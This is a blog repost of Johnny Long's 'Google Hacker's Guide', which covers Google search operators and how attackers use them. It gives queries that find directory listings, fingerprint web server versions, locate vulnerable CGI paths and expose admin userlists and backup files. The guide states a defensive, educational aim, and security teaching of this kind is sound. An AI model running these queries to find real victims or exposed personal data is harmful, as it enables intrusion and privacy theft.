Search The Web
Sunday, June 13, 2010
Saturday, June 12, 2010
Saturday, June 5, 2010
The Google Hacker’s Guide
The Google Hacker’s Guide
- Page 1 -
The Google Hacker’s Guide
Understanding and Defending Against
the Google Hacker
by Johnny Long
johnny@ihackstuff.com
http://johnny.ihackstuff.com
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 2 -
GOOGLE SEARCH TECHNIQUES................................................................................................................ 3
GOOGLE WEB INTERFACE.................................................................................................................................. 3
BASIC SEARCH TECHNIQUES .............................................................................................................................. 7
GOOGLE ADVANCED OPERATORS ........................................................................................................... 9
ABOUT GOOGLE’S URL SYNTAX .................................................................................................................... 12
GOOGLE HACKING TECHNIQUES........................................................................................................... 13
DOMAIN SEARCHES USING THE ‘SITE’ OPERATOR........................................................................................... 13
FINDING ‘GOOGLETURDS’ USING THE ‘SITE’ OPERATOR................................................................................. 14
SITE MAPPING: MORE ABOUT THE ‘SITE’ OPERATOR...................................................................................... 15
FINDING DIRECTORY LISTINGS ........................................................................................................................ 16
VERSIONING: OBTAINING THE WEB SERVER SOFTWARE / VERSION ............................................................. 17
via directory listings .................................................................................................................................. 17
via default pages ........................................................................................................................................ 19
via manuals, help pages and sample programs......................................................................................... 21
USING GOOGLE AS A CGI SCANNER................................................................................................................ 23
USING GOOGLE TO FIND INTERESTING FILES AND DIRECTORIES .................................................................... 25
ABOUT GOOGLE AUTOMATED SCANNING.......................................................................................... 26
OTHER GOOGLE STUFF .............................................................................................................................. 27
GOOGLE APPLIANCES ..................................................................................................................................... 27
GOOGLEDORKS................................................................................................................................................ 27
GOOSCAN ........................................................................................................................................................ 28
GOOPOT .......................................................................................................................................................... 28
A WORD ABOUT HOW GOOGLE FINDS PAGES (OPERA)................................................................. 30
PROTECTING YOURSELF FROM GOOGLE HACKERS...................................................................... 30
THANKS AND SHOUTS................................................................................................................................. 31
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 3 -
The Google search engine found at www.google.com offers many different features
including language and document translation, web, image, newsgroups, catalog and
news searches and more. These features offer obvious benefits to even the most
uninitiated web surfer, but these same features allow for far more nefarious possibilities
to the most malicious Internet users including hackers, computer criminals, identity
thieves and even terrorists. This paper outlines the more nefarious applications of the
Google search engine, techniques that have collectively been termed “Google hacking.”
The intent of this paper is to educate web administrators and the security community in
the hopes of eventually securing this form of information leakage.
Google search techniques
Google web interface
The Google search engine is fantastically easy to use. Despite the simplicity, it is very
important to have a firm grasp of these basic techniques in order to fully comprehend the
more advanced uses. The most basic Google search can involve a single word entered
into the search page found at www.google.com.
Figure 1: The main Google search page
As shown in Figure 1, I have entered the word “sardine” into the search screen. Figure 1
shows many of the options available from the www.google.com front page.
The Google toolbar The Internet Explorer browser I am using has a Google
“toolbar” (a free download from toolbar.google.com) installed
and presented under the address bar. Although the toolbar
offers many different features, it is not a required element for
performing advanced searches. Even the most advanced
search functionality is available to any user able to access the
www.google.com web page with any type of browser, including
text-based and mobile browsers.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 4 -
text-based and mobile browsers.
“Web, Images,
Groups, Directory and
News” tabs
These tabs allow you to search web pages, photographs,
message group postings, Google directory listings, and news
stories respectively. First-time Google users should consider
that these tabs are not always a replacement for the “Submit
Search” button.
Search term input field Located directly below the alternate search tabs, this text field
allows the user to enter a Google search term. Search term
rules will be described later.
“Submit Search” This button submits the search term supplied by the user. In
many browsers, simply pressing the “Enter/Return” key after
typing a search term will activate this button.
“I’m Feeling Lucky” Instead of presenting a list of search results, this button will
forward the user to the highest-ranked page for the entered
search term. Often times, this page is the most relevant page
for the entered search term.
“Advanced Search” This link takes the user to the “Advanced Search” page as
shown in Figure 2. Much of the advanced search functionality is
accessible from this page. Some advanced features are not
listed on this page.
“Preferences” This link allows the user to select several options (which are
stored in cookies on the user’s machine for later retrieval)
including languages, filters, number of results per page, and
window options.
“Language tools” This link allows the user to set many different language options
and translate text to and from various languages.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 5 -
Figure 2: Advanced Search page
Once a user submits a search by clicking the “Submit Search” button or by pressing
enter in the search term input box, a results page may be displayed as shown in Figure
3.
Figure 3: A basic Google search results page.
The search results page allows the user to explore the search results in various ways.
Top line The top line (found under the alternate search tabs) lists the
search query, the number of hits displayed and found, and
how long the search took.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 6 -
search query, the number of hits displayed and found, and
how long the search took.
“Category” link This link takes you to the Google directory category for the
search you entered. The Google directory is a highly
organized directory of the web pages that Google monitors.
Main page link This link takes you directly to a web page. Figure 3 shows
this as “Sardine Factory :: Home page”
Description The short description of a site
Cached link This link takes you to Google’s copy of this web page. This
is very handy if a web page changes or goes down.
“Similar Pages” This link takes to you similar pages based on the Google
category.
“Sponsored Links”
coluimn
This column lists pay targeted advertising links based on
your search query.
Under certain circumstances, a blank error page (See Figure 4) may be presented
instead of the search results page. This page is the catchall error page, which generally
means Google encountered a problem with the submitted search term. Many times this
means that a search query option was not entered properly.
Figure 4: The "blank" error page
In addition to the “blank” error page, another error page may be presented as shown in
Figure 5. This page is much more descriptive, informing the user that a search term was
missing. This message indicates that the user needs to add to the search query.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 7 -
Figure 5: Another Google error page
There is a great deal more to Google’s web-based search functionality which is not
covered in this paper.
Basic search techniques
Simple word searches
Basic Google searches, as I have already presented, consist of one or more
words entered without any quotations or the use of special keywords. Examples:
peanut butter
butter peanut
olive oil popeye
‘+’ searches
When supplying a list of search terms, Google automatically tries to find every
word in the list of terms, making the Boolean operator “AND” redundant. Some
search engines may use the plus sign as a way of signifying a Boolean “AND”.
Google uses the plus sign in a different fashion. When Google receives a basic
search request that contains a very common word like “the”, “how” or “where”,
the word will often times be removed from the query as shown in Figure 6.
Figure 6: Google removing overly common words
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 8 -
In order to force Google to include a common word, precede the search term with
a plus (+) sign. Do not use a space between the plus sign and the search term.
For example, the following searches produce slightly different results:
where quick brown fox
+where quick brown fox
The ‘+’ operator can also be applied to Google advanced operators, discussed
below.
‘-‘ searches
Excluding a term from a search query is as simple as placing a minus sign (-)
before the term. Do not use a space between the minus sign and the search
term. For example, the following searches produce slightly different results:
quick brown fox
quick –brown fox
The ‘-’ operator can also be applied to Google advanced operators, discussed
below.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 9 -
Phrase Searches
In order to search for a phrase, supply the phrase surrounded by double-quotes.
Examples:
“the quick brown fox”
“liberty and justice for all”
“harry met sally”
Arguments to Google advanced operators can be phrases enclosed in quotes, as
described below.
Mixed searches
Mixed searches can involve both phrases and individual terms. Example:
macintosh "microsoft office"
This search will only return results that include the phrase “Microsoft office” and
the term macintosh.
Google advanced operators
Google allows the use of certain operators to help refine searches. The use of advanced
operators is very simple as long as attention is given to the syntax. The basic format is:
operator:search_term
Notice that there is no space between the operator, the colon and the search term. If a
space is used after a colon, Google will display an error message. If a space is used
before the colon, Google will use your intended operator as a search term.
Some advanced operators can be used as a standalone query. For example
‘cache:www.google.com’ can be submitted to Google as a valid search query. The
‘site’ operator, by contrast, must be used along with a search term, such as
‘site:www.google.com help’.
Table 1: Advanced Operator Summary
Operator Description Additional search
argument required?
site: find search term only on site specified by search_term. YES
filetype: search documents of type search_term YES
link: find sites containing search_term as a link NO
cache: display the cached version of page specified by
search_term
NO
intitle: find sites containing search_term in the title of a page NO
inurl: find sites containing search_term in the URL of the page NO
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 10 -
site: find web pages on a specific web site
This advanced operator instructs Google to restrict a search to a specific web site or
domain. When using this operator, an addition search argument is required.
Example:
site:harvard.edu tuition
This query will return results from harvard.edu that include the term tuition anywhere on
the page.
filetype: search only within files of a specific type.
This operator instructs Google to search only within the text of a particular type of file.
This operator requires an additional search argument.
Example:
filetype:txt endometriosis
This query searches for the word ‘endometriosis’ within standard text documents. There
should be no period (.) before the filetype and no space around the colon following the
word “filetype”. It is important to note thatGoogle only claims to be able to search within
certain types of files. Based on my experience, Google can search within most files that
present as plain text. For example, Google can easily find a word within a file of type
“.txt,” “.html” or “.php” since the output of these files in a typical web browser window is
textual. By contrast, while a WordPerfect document may look like text when opened with
the WordPerfect application, that type of file is not recognizable to the standard web
browser without special plugins and by extension, Google can not interpret the
document properly, making a search within that document impossible. Thankfully,
Google can search within specific type of special files, making a search like
“filetype:doc endometriosis“ a valid one.
The current list of files that Google can search is listed in the filetype FAQ located at
http://www.google.com/help/faq_filetypes.html. As of this writing, Google can search
within the following file types:
• Adobe Portable Document Format (pdf)
• Adobe PostScript (ps)
• Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
• Lotus WordPro (lwp)
• MacWrite (mw)
• Microsoft Excel (xls)
• Microsoft PowerPoint (ppt)
• Microsoft Word (doc)
• Microsoft Works (wks, wps, wdb)
• Microsoft Write (wri)
• Rich Text Format (rtf)
• Text (ans, txt)
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 11 -
link: search within links
The hyperlink is one of the cornerstones of the Internet. A hyperlink is a selectable
connection from one web page to another. Most often, these links appear as underlined
text but they can appear as images, video or any other type of multimedia content. This
advanced operator instructs Google to search within hyperlinks for a search term. This
operator requires no other search arguments.
Example:
link:www.apple.com
This query query would display web pages that link to Apple.com’s main page. This
special operator is somewhat limited in that the link must appear exactly as entered in
the search query. The above query would not find pages that link to
www.apple.com/ipod, for example.
cache: display Google’s cached version of a page
This operator displays the version of a web page as it appeared when Google crawled
the site. This operator requires no other search arguments.
Example:
cache:johnny.ihackstuff.com
cache:http://johnny.ihackstuff.com
These queries would display the cached version of Johnny’s web page. Note that both of
these queries return the same result. I have discovered, however, that sometimes
queries formed like these may return different results, with one result being the dreaded
“cache page not found” error. This operator also accepts whole URL lines as arguments.
intitle: search within the title of a document
This operator instructs Google to search for a term within the title of a document. Most
web browsers display the title of a document on the top title bar of the browser window.
This operator requires no other search arguments.
Example:
intitle:gandalf
This query would only display pages that contained the word ‘gandalf’ in the title. A
derivative of this operator, ‘allintitle’ works in a similar fashion.
Example:
allintitle:gandalf silmarillion
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 12 -
This query finds both the words ‘gandalf’ and ‘silmarillion’ in the title of a page. The
‘allintitle’ operator instructs Google to find every subsequent word in the query only in the
title of the page. This is equivalent to a string of individual ‘intitle’ searches.
inurl: search within the URL of a page
This operator instructs Google to search only within the URL, or web address of a
document. This operator requires no other search arguments.
Example:
inurl:amidala
This query would display pages with the word ‘amidala’ inside the web address. One
returned result, ‘http://www.yarwood.org/kell/amidala/’ contains the word
‘amidala’ as the name of a directory. The word can appear anywhere within the web
address, including the name of the site or the name of a file. A derivative of this operator,
‘allinurl’ works in a similar fashion.
Example:
allinurl:amidala gallery
This query finds both the words ‘amidala’ and ‘gallery’ in the URL of a page. The ‘allinurl’
operator instructs Google to find every subsequent word in the query only in the URL of
the page. This is equivalent to a string of individual ‘inurl’ searches.
For a complete list of advanced operators and their usage, see
http://www.google.com/help/operators.html.
About Google’s URL syntax
The advanced Google user often times streamlines the search process by use of the
Google toolbar (not discussed here) or through direct use of Google URL’s. For
example, consider the URL generated by the web search for sardine:
http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=sardine
First, notice that the base URL for a Google search is
“http://www.google.com/search”. The question mark denotes the end of the URL
and the beginning of the arguments to the “search” program. The “&” symbol separates
arguments. The URL presented to the user may vary depending on many factors
including whether or not the search was submitted via the toolbar, the native language of
the user, etc. Arguments to the Google search program are well documented at
http://www.google.com/apis. The arguments found in the above URL are as follows:
hl: Native language results, in this case “en” or English.
ie: Input encoding, the format of incoming data. In this case “UTF-8”.
oe: Output encoding, the format of outgoing data. In this case “UTF-8”.
q: Query. The search query submitted by the user. In this case “sardine”.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 13 -
Most of the arguments in this URL can be omitted, making the URL much more concise.
For example, the above URL can be shortened to
http://www.google.com/search?q=sardine
making the URL much more concise. Additional search terms can be appended to the
URL with the plus sign. For example, to search for “sardine” along with “peanut” and
“butter,” consider using this URL:
http://www.google.com/search?q=sardine+peanut+butter
Since simplified Google URLs are simple to read and portable, they are often used as a
way to represent a Google search.
Google (and many other web-based programs) must represent special characters like
quotation marks in a URL with a hexadecimal number preceded by a percent (%) sign in
order to follow the http URL standard. For example, a search for “the quick brown fox”
(paying special attention to the quotation marks) is represented as
http://www.google.com/search?&q=%22the+quick+brown+fox%22
In this example, a double quote is displayed as “%22” and spaces are replaced by plus
(+) signs. Google does not exclude overly common words from phrase searches. Overly
common words are automatically included when enclosed in double-quotes.
Google hacking techniques
Domain searches using the ‘site’ operator
The site operator can be expanded to search out entire domains. For example:
site:gov secret
This query searches every web site in the .gov domain for the word ‘secret’. Notice that
the site operator works on addresses in reverse. For example, Google expects the site
operator to be used like this:
site:www.cia.gov
site:cia.gov
site:gov
Google would not necessarily expect the site operator to be used like this:
site:www.cia
site:www
site:cia
The reason for this is simple. ‘Cia’ and ‘www’ are not valid top-level domain names. This
means that as of this writing, Internet names may not end in ‘cia’ or ‘www’. However,
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 14 -
sending unexpected queries like these are part of a competent Google hacker’s arsenal
as we explore in the “googleturds” section.
How this technique can be used
1. Journalists, snoops and busybodies in general can use this technique to find
interesting ‘dirt’ about a group of websites owned by organizations such as a
government or non-profit organization. Remember that top-level domain names
are often very descriptive and can include interesting groups such as: the U.S.
Government (.gov or .us)
2. Hackers searching for targets. If a hacker harbors a grudge against a specific
country or organization, he can use this type of search to find sensitive targets.
Finding ‘googleturds’ using the ‘site’ operator
Googleturds, as I have named them, are little dirty pieces of Google ‘waste’. These
search results seem to have stemmed from typos Google found while crawling a web
page. Example:
site:csc
site:microsoft
Neither of these queries are valid according to the loose rules of the ‘site’ operator, since
they do not end in valid top-level domain names. However, these queries produce
interesting results as shown in Figure 7.
Figure 7: Googleturd example
These little bits of information are most likely the results of typographical errors in links
place on web pages.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 15 -
How this technique can be used
Hackers investigating a target can use munged site values based on the target’s name
to dig up Google pages (and subsequently potential sensitive data) that may not be
available to Google searches using the valid ‘site’ operator. Example: A hacker is
interested in sensitive information about ABCD Corporation, located on the web at
www.ABCD.com. Using a query like ‘site:ABCD’ may find mistyped links
(http://www.abcd instead of http://www.abcd.com) containing interesting information.
Site mapping: More about the ‘site’ operator
Mapping the contents of a web server via Google is simple. Consider the following
query:
site:www.microsoft.com microsoft
This query searches for the word ‘microsoft’, restricting the search to the
www.microsoft.com web site. How many pages on the Microsoft web server contain the
word ‘microsoft?’ According to Google, all of them! Remember that Google searches not
only the content of a page, but the title and URL as well. The word ‘microsoft’ appears in
the URL of every page on www.microsoft.com. With one single query, an attacker gains
a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the www.micorosft.com web server. In this special case, an attacker
would simply alter the query, replacing the word ‘microsoft’ with the IP address(es) of the
Microsoft web server.
Google has recently added an additional method of accomplishing this task. This
technique allows Google users to simply enter a ‘site’ query alone. Example:
site:microsoft.com
This technique is simpler, but I’m not sure if this search technique is a permanent
Google feature.
Since Google only follows links that it finds on the Web, don’t expect this technique to
return every single web page hosted on a web server.
How this technique can be used
This technique makes it very simple for any interested party to get a complete rundown
of a website’s structure without ever visiting the website directly. Since Google searches
occur on Google’s servers, it stands to reason that only Google has a record of that
search. The process of viewing cached pages from Google can also be safe as long as
the Google hacker takes special care not to allow his browser to load linked content
such as images from that cached page. For a competent attacker, this is a trivial
exercise. Simply put, Google allows for a great deal of target reconnaissance that results
in little or no exposure for the attacker.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 16 -
Finding Directory listings
Directory listings provide a list of files and directories in a browser window instead of the
typical text-and graphics mix generally associated with web pages. Figure 8 shows a
typical directory listing.
Figure 8: A typical directory listing
Directory listings are often placed on web servers purposely to allow visitors to browse
and download files from a directory tree. Many times, however, directory listings are not
intentional. A misconfigured web server may produce a directory listing if an index, or
main web page file is missing. In some cases, directory listings are setup as a
temporarily storage location for files. Either way, there’s a good chance that an attacker
may find something interesting inside a directory listing.
Locating directory listings with Google is fairly straightforward. Figure 8 shows that most
directory listings begin with the phrase “Index of”, which also shows in the title. An
obvious query to find this type of page might be “intitle:index.of”, which may find
pages with the term ‘index of’ in the title of the document. Remember that the period (.)
serves as a single-character wildcard in Google. Unfortunately, this query will return a
large number of false-positives such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these web
pages intentional, they are also not the directory listings we are looking for. (*jedi wave*
“This is not the directory listing you’re looking for.”) Several alternate queries provide
more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 17 -
These queries indeed provide directory listings by not only focusing on “index.of” in the
title, but on key words often found inside directory listings such as “parent directory”
“name” and “size.”
How this technique can be used
Bear in mind that many directory listings are intentional. However, directory listings
provide the Google hacker a very handy way to quickly navigate through a site. For the
purposes of finding sensitive or interesting information, browsing through lists of file and
directory names can be much more productive than surfing through the guided content
of web pages. Directory listings provide a means of exploiting other techniques such as
versioning and file searching, explained below.
Versioning: Obtaining the Web Server Software / Version
via directory listings
The exact version of the web server software running on a server is one piece of
required information an attacker requires before launching a successful attack against
that web server. If an attacker connects directly to that web server, the HTTP (web)
headers from that server can provide this information. It is possible, however, to retrieve
similar information from Google without ever connecting to the target server under
investigation. One method involves the using the information provided in a directory
listing.
Figure 9: Directory listing "server.at" example
Figure 9 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but this information is often legitimate, allowing
an attacker to determine what attacks may work against the server. This example was
gathered using the following query:
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 18 -
intitle:index.of server.at
This query focuses on the term “index of” in the title and “server at” appearing at the
bottom of the directory listing. This type of query can additionally be pointed at a
particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com,
both run Apache web servers.
intitle:index.of server.at site:apple.com
The result of this query indicates that mirror.apple.com runs an Apache web server. This
technique can also be used to find servers running a particular version of a web server.
For example:
intitle:index.of "Apache/1.3.0 Server at"
This query will find servers with directory listings enabled that are running Apache
version 1.3.0.
How this technique can be used
This technique is somewhat limited by the fact that the target must have at least one
page that produces a directory listing, and that listing must have the server version
stamped at the bottom of the page. There are more advanced techniques that can be
employed if the server ‘stamp’ at the bottom of the page is missing. This technique
involves a ‘profiling’ technique which involves focusing on the headers, title, and overall
format of the directory listing to observe clues as to what web server software is running.
By comparing known directory listing formats to the target’s directory listing format, a
competent Google hacker can generally nail the server version fairly quickly. This
technique is also flawed in that most servers allow directory listings to be completely
customized, making a match difficult. Some directory listings are not under the control of
the web server at all but instead rely on third-party software. In this particular case, it
may be possible to identify the third party software running by focusing on the source
(‘view source’ in most browsers) of the directory listing’s web page or by using the
profiling technique listed above.
Regardless of how likely it is to determine the web server version of a specific server
using this technique, hackers (especially web defacers) can use this technique to troll
Google for potential victims. If a hacker has an exploit that works against, say Apache
1.3.0, he can quickly scan Google for victims with a simple search like
‘intitle:index.of "Apache/1.3.0 Server at"’. This would return a list of
servers that have at least one directory listing with the Apache 1.3.0 server tag at the
bottom of the listing. This technique can be used for any web server that tags directory
listings with the server version, as long as the attacker knows in advance what that tag
might look like.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 19 -
via default pages
It is also possible to determine the version of a web server based on default pages.
When a web server is installed, it generally will ship with a set of default web pages, like
the Apache 1.2.6 page shown in Figure 10.
Figure 10: Apache test page
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case,
an Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained and is, by extension insecure. By
further extension, the attacker can also assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
How this technique can be used
A simple query of “intitle:Test.Page.for.Apache it.worked!" will return a list
of sites running Apache 1.2.6 with a default home page. Other queries will return similar
Apache results:
Apache server version Query
Apache 1.3.0 – 1.3.9 Intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11 – 1.3.26 Intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0 Intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS Intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 20 -
Microsoft’s Internet Information Services (IIS) also ships with default web pages as
shown in Figure 11.
Figure 11: IIS 5.0 default web page
Queries that will locate default IIS web pages include:
IIS Server Version Query
Many intitle:welcome.to intitle:internet IIS
Unknown intitle:"Under construction" "does not currently have"
IIS 4.0 intitle:welcome.to.IIS.4.0
IIS 4.0 allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0 allintitle:Welcome to Internet Information Server
IIS 5.0 allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0 allintitle:Welcome to Windows XP Server Internet Services
In the case of Microsoft-based web servers, it is not only possible to determine web
server version, but operating system and server pack version as well. This information is
invaluable to an attacker bent on hacking not only the web server, but hacking beyond
the web server and into the operating system itself. In most cases, an attacker with
control of the operating system can wreak more havoc on a machine than a hacker that
only controls the web server.
Netscape Servers also ship with default pages as shown in Figure 12.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 21 -
Figure 12: Netscape Enterprise Server default page
Some queries that will locate default Netscape web pages include:
Netscape Server Version Query
Many allintitle:Netscape Enterprise Server Home Page
Unknown allintitle:Netscape FastTrack Server Home Page
Some queries to find more esoteric web servers/applications include:
Server / Version Query
Jigsaw / 2.2.3 intitle:"jigsaw overview" "this is your"
Jigsaw / Many intitle:”jigsaw overview”
iPlanet / Many intitle:"web server, enterprise edition"
Resin / Many allintitle:Resin Default Home Page
Resin / Enterprise allintitle:Resin-Enterprise Default Home Page
JWS / 1.0.3 – 2.0 allintitle:default home page java web server
J2EE / Many intitle:"default j2ee home page"
KFSensor honeypot "KF Web Server Home Page"
Kwiki "Congratulations! You've created a new Kwiki website."
Matrix Appliance "Welcome to your domain web page" matrix
HP appliance sa1* intitle:"default domain page" "congratulations" "hp web"
Intel Netstructure "congratulations on choosing" intel netstructure
Generic Appliance "default web page" congratulations "hosting appliance"
Debian Apache intitle:"Welcome to Your New Home Page!" debian
Cisco Micro
Webserver 200
"micro webserver home page"
via manuals, help pages and sample programs
Another method of determining server version involves searching for manuals, help
pages or sample programs which may be installed on the website by default. Many web
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 22 -
server distributions install manual pages and sample programs in default locations. Over
the years, hackers have found many ways to exploit these default web applications to
gain privileged access to the web server. Because of this, most web server vendors
insist that administrators remove this sample code before placing a server on the
Internet. Regardless of the potential vulnerability of such programs, the mere existence
of these programs can help determine the web server type and version. Google can
stumble on these directories via a default-installed webpage or other means.
How this technique can be used
In addition to determining the web server version of a specific target, hackers can use
this technique to find vulnerable targets.
Example:
inurl:manual apache directives modules
This query returns pages that host the Apache web server manuals. The Apache
manuals are included in the default installation package of many different versions of
Apache. Different versions of Apache may have different styles of manual, and the
location of manuals may differ, if they are installed at all. As evidenced in Figure 13, the
server version is reported at the top of the manual page. This may not reflect the current
version of the web server if the server has been upgraded since the original installation.
Figure 13: Determining server version via server manuals
Microsoft’s IIS often deploy manuals (termed ‘help pages’) with various versions of their
web server. One way to search for these default help pages is with a query like
‘allinurl:iishelp core’.
Many versions of IIS optionally install sample applications. Many times, these sample
applications are included in a directory called ‘iissamples,’ which may be discovered
using a query like ‘inurl:iissamples’. In addition, the names of a sample program
can be included in the query such as ‘inurl:iissamples advquery.asp’ as shown
in Figure 14.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 23 -
Figure 14: An IIS server with default sample code installed
Many times, subdirectories may exist inside the samples directory. A page with both the
‘iissamples’ directory and the ‘sdk’ directory can be found with a query like
‘inurl:iissamples sdk’.
There are many more combinations of default manual, help pages and sample programs
that can be searched for. As mentioned above, these programs often contain
vulnerabilities. Searching for vulnerable programs is yet another trick of the Google
hacker.
Using Google as a CGI scanner
The ‘CGI scanner’ or ‘web scanner’ has become one of the most indispensable tools in
the world of web server hacking. Mercilessly searching out vulnerable programs on a
server, these programs help pinpoint potential avenues for attack. These programs are
brutally obvious, incredibly noisy and fairly accurate tools. However, the accomplished
Google hacker knows there are more subtle and interesting ways to attempt the same
task.
In order to accomplish its task, these scanners must know what exactly to search for on
a web server. In most cases these tools are scanning web servers looking for
vulnerable files or directories that may contain sample code or vulnerable files. Either
way, the tools generally store these vulnerabilities in a file that is formatted like the
following except:
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 24 -
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
How this technique can be used
The lines in a vulnerability file like the one shown above can serve as a roadmap for a
Google hacker. Each line can be broken down and used in either an ‘index.of’ or an
‘inurl’ search to find vulnerable targets. For example, a Google search for
‘allinurl:/random_banner/index.cgi’ returns the results shown in Figure 15.
Figure 15: Example search using a line from a CGI scanner
A hacker can take sites returned from this Google search, apply a bit of hacker ‘magic’
and eventually get the broken ‘random_banner’ program to cough up any file on that
web server, including the password file as shown in Figure 16.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 25 -
Figure 16: password file captured from a vulnerable site found using a Google search
Of the many Google hacking techniques we’ve looked at, this technique is one of the
best candidates for automation since the CGI scanner vulnerability files can be very
large. The gooscan tool, written by j0hnny performs this and many other functions.
Gooscan and automation is discussed later.
Using Google to find interesting files and directories
Using Google to find vulnerable targets can be very rewarding. However, it is often more
rewarding to find not only vulnerabilities but to find sensitive data that is not meant for
public viewing. People and organizations leave this type of data on web servers all the
time (trust me, I’ve found quite a bit of it). Now remember, Google is only crawling a
small percentage of the pages that contain this type of data, but the tradeoff is that
Google’s data can be retrieved from Google quickly, quietly and without much fuss.
It is not uncommon to find sensitive data such as financial information, social security
numbers, medical information, and the like.
How this technique can be used
Of all the techniques examined this far, this technique is the hardest to describe because
it takes a bit of imagination and sometimes just a bit of luck. Often the best way to find
sensitive files and directories is to find them in the context of other “important” words and
phrases.
Example:
Consider the fact that many people store an entire hodgepodge of data inside backup
directories. Often times, the entire content of a web server or personal computer can be
found in a directory called backup. Using a simple query like “inurl:backup” can
yield potential backup directories, yet refining the search to something like
“inurl:backup intitle:index.of inurl:admin” can reveal even more
relevant results.
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 26 -
A query like “inurl:admin” can often reveal administrative directories. Several
combinations of this query are often fruitful. For example:
“inurl:admin intitle:login” can reveal admin login pages
“inurl:admin filetype:xls” can reveal interesting Excel spreadsheets either
named “admin” or stored in a directory named “admin”. Educational institutions are
notorious for falling victim to this search.
“inurl:admin inurl:userlist” is a generic catch-all query which finds many
different types of administrative userlist pages. These results may take some sorting
through, but the benefits are certainly worth it, as results range from usernames,
passwords, phone numbers, addresses, etc.
“inurl:admin filetype:asp inurl:userlist” will find more specific examples
of an administrator’s user list function, this time written in an ASP page. In most cases,
these types of pages do not require authentication.
About Google automated scanning
With so many potential search combinations available, it’s obvious that an automated
tool scanning for a known list of potentially dangerous pages would be extremely useful.
However, Google frowns on such automation as quoted at
http://www.google.com/terms_of_service.html:
“You may not send automated queries of any sort to Google's system without
express permission in advance from Google. Note that "sending automated
queries" includes, among other things:
• using any software which sends queries to Google to determine how a
website or webpage "ranks" on Google for various queries;
• "meta-searching" Google; and
• performing "offline" searches on Google.”
Google does offer alternatives to this policy in the form of the Google Web API’s found at
http://www.google.com/apis/. There are several major drawbacks to the Google API
program at the time of this writing. First, users and developers of Google API programs
must both have Google license keys. This puts a damper on the potential user base of
Google API programs. Secondly, API-created programs are limited to 1,000 queries per
day since “The Google Web APIs service is an experimental free program, so the
resources available to support the program are limited.” (according to the API FAQ found
at http://www.google.com/apis/api_faq.html#gen12.) With so many potential searches,
1000 queries is simply not enough.
The bottom line is that any user running an automated Google querying tool (with the
exception of API created tools) must obtain express permission in advance to do so. It is
unknown what the consequences of ignoring these terms of service are, but it seems
best to stay on Google’s good side.
The only exception to this rule appears to be the Google search appliance (described
below). The Google search appliance does not have the same automated query
The Google Hacker’s Guide
johnny@ihackstuff.com
http://johnny.ihackstuff.com
- Page 27 -
restrictions since the end user, not Google, owns the appliance. One should, however,
obtain advance express permission from the owner or maintainer of the Google
appliance before searching it with any automated tool for various legal and moral
reasons.
Other Google stuff
